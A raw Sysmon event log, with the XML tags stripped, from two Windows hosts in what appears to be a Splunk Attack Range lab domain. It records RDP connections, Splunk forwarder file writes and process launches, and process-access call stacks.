09:04:39.503{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60916-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048672Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:42.788{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D4C5AF77334F3CB001F5BF93B520201,SHA256=209D64246439FBC0F7B55FD24F2231F8F6B6222AD9DE268993B0CE3A36D515A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048671Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:42.788{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05185F99F77ECD927F17549DAAA20A2D,SHA256=8C2E58529537233F2CA24C69F95D9D8DF7D32F740A3A0A378D56B409E6B07735,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048670Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:42.457{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C99E026665F2D4C44772DE0C33D3312,SHA256=437D3CE4E118B10B841F06FC7CA0FC965AC3A81F012F9398822130400EB183FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977339Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:42.898{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2BD59859B107A9976FACD52330478C04,SHA256=38D89D09E564DF417A2990410794340E82732363D9CBA541F3AD1CD4E531BE6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977338Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:42.020{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E389D53E7BCABB36E1EA7387348D3135,SHA256=79B85542E5BB316693D17ED82313D4F73471D56AC7412ECE0ECDF4E29CC081D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048674Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:43.472{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0C55387C013F9BEEAACBA9654A586A6,SHA256=1D4B3104DAFA7144D3DA4984BA77ABD68E5B379B503E7433334A7D6DB8C96CC8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977341Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:40.385{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54984-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977340Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:43.023{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05056AB1E65A8C6D43EF2E787360A22B,SHA256=2152A503E6EBC413CF018A14E2A9CE87E27BBC3E55FF1C03FA961FB7FDF69D3A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048673Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:41.799{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53254-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001048683Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:44.588{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-892C-6151-017A-00000000FC01}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048682Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:44.588{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048681Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:44.588{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048680Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:44.588{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048679Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:44.588{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048678Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:44.588{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-892C-6151-017A-00000000FC01}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048677Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:44.588{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-892C-6151-017A-00000000FC01}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048676Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:44.574{5EBD8912-892C-6151-017A-00000000FC01}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048675Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:44.557{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D88903E20E31287769A52E7FC894D457,SHA256=A2C3316F53D6FF25BFC264DA90EAE23FA419DFB1D0501296F1687B654A303FE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977342Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:44.039{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E04ACE3EEB1CA7DDCEF8031929C80DE,SHA256=AE8F2A13B1806516096F7826F1ACD78C1357E2413A0EBA9F157C728D3E890894,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048702Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.971{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-892D-6151-037A-00000000FC01}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048701Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.971{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048700Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.971{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048699Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.971{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048698Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.971{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048697Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.971{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-892D-6151-037A-00000000FC01}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048696Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.971{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-892D-6151-037A-00000000FC01}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048695Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.956{5EBD8912-892D-6151-037A-00000000FC01}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048694Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.640{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D4C5AF77334F3CB001F5BF93B520201,SHA256=209D64246439FBC0F7B55FD24F2231F8F6B6222AD9DE268993B0CE3A36D515A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048693Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.572{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3832ECB8B4F8AC69C40625262032A6B,SHA256=9828C01660F81EDE1E8D70E8BE5715436761C9155F31AA79BA8E54D6DCEE8647,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977345Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:45.929{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4EC5399871B2EF635F6164907ADCABDD,SHA256=DCD13B4CA2E2909964485D1569C5BE1C41D8FE69DCFD72B09833733E087588FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977344Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:42.800{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-30495-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977343Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:45.054{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAD83EA6B1CB43FD4D8F61778B42D88D,SHA256=2625E8A9E7127D6EEDC3834893E189AA83DFBC933689327777E9680FE38079C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048692Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.441{5EBD8912-892D-6151-027A-00000000FC01}71004396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048691Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.272{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-892D-6151-027A-00000000FC01}7100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048690Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.272{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048689Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 